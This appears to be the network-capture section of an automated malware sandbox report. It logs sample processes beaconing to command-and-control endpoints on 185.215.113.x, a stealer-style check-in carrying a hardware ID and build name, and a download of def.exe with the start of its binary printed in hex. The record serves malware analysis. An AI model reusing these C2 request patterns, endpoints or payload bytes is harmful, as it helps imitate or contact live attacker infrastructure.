                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:51.975744963 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      26192.168.2.65016234.107.221.82805552C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.317761898 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.782762051 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:23:05 GMT
                                                                                                                                                                                                                                                                                      Age: 5557
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:52.801351070 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      27192.168.2.650165185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:43.070827961 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:43.809240103 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:43 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      28192.168.2.650166185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:45.680063009 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:46.379547119 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:46 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      29192.168.2.650168185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:48.099730015 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:48.841401100 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:48 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      30192.168.2.650169185.215.113.206805576C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:48.714754105 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:49.405673027 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:49 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:49.538467884 CET411OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJ
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 209
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 43 34 45 46 33 32 41 37 44 35 34 37 38 32 34 35 32 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="hwid"2BC4EF32A7D547824525------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="build"mars------DBGHJEBKJEGHJKECAAKJ--
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:49.772039890 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:49 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                                                                      Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      31192.168.2.650170185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:50.561850071 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:51.256422997 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:51 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      32192.168.2.650172185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:52.785835028 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:53.488699913 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:53 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      33192.168.2.650173185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:55.333801985 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:56.022176981 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:55 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      34192.168.2.650174185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:58.199174881 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:58.930115938 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:58 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      35192.168.2.650177185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:00.639962912 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:01.345210075 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:01 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      36192.168.2.650179185.215.113.16805932C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:02.276186943 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Host: 185.215.113.16
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:03.017388105 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:02 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      Content-Length: 2741248
                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 20 Nov 2024 09:40:15 GMT
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      ETag: "673dae7f-29d400"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 f4 14 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$@* `@ **`Ui` @ @.rsrc`2@.idata 8@yggyennp)r):@ceftresi *)@.taggant@@*")@
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:03.017431021 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:03.017482042 CET448INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:03.017517090 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:03.017551899 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:03.017585039 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:03.017625093 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:03.017657042 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:03.017692089 CET1236INData Raw: a2 42 54 41 61 d4 83 20 dd dd a3 31 75 e4 8c b8 d9 cb a7 99 f3 89 f5 1c 9b 6e ca 48 22 e9 f5 74 9a 5a bc 92 fc b5 77 0b aa e5 ae 94 51 01 05 e1 c3 cc c6 7a ec 53 6f 13 d9 2a 5d d2 9c 08 71 d9 db b7 2b 5f 4f 4b c8 40 1c db 6f 6a b8 ed 59 95 ea 19
                                                                                                                                                                                                                                                                                      Data Ascii: BTAa 1unH"tZwQzSo*]q+_OK@ojYjq?%i:/4lp=!s|oh#g&{qT)xqlWfom;[|RULA_,(fnq&P`M
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:03.017726898 CET1236INData Raw: 1e 2e 96 fc 23 1a 5a 8b 5a de a7 52 20 fb 48 d4 b0 27 a2 f2 5f 19 cd 12 0f 4c 7f bf c0 1a 43 9b 59 e2 7d d4 6b 1c 24 95 11 15 f1 db 18 0e 27 d0 9f e5 b2 de 95 bb 89 7c 20 6b 71 68 27 7e 03 d6 21 70 73 2f 64 03 9e db a5 d7 ab 3a 3b 7b 06 30 e1 68
                                                                                                                                                                                                                                                                                      Data Ascii: .#ZZR H'_LCY}k$'| kqh'~!ps/d:;{0h0{sLPuV]KF:@32%MD$3j<wC}_{t+\(QB4t|fu*w>Y,SmuLl}
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:03.023176908 CET1236INData Raw: 17 e6 ba 18 ed 1c c6 96 1a 68 3c d5 e4 1d 2b dd 41 dc f5 45 3c d2 44 bc f7 82 e9 a6 25 3a c7 61 58 29 0a b1 dd 54 01 d4 de 35 f5 dc d7 24 aa fd 47 26 ee d1 0d 0e 0a e1 60 96 84 3b 60 05 f1 c1 fa ef 6e 04 41 d1 f8 ed 6a 2b 6a f1 0b a5 76 fc 49 32
                                                                                                                                                                                                                                                                                      Data Ascii: h<+AE<D%:aX)T5$G&`;`nAj+jvI2xrL,;(.dEE ^W429V<5!y`xtxT5"8_(r~UE>feZV>5MLzeEX$R|'g!*2


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      37192.168.2.650180185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
